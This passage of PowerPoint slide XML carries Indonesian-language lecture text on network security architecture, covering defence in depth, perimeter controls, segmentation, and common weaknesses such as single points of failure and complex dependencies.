            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melancarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host internal yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dahsyat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjepit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergoda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengorbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
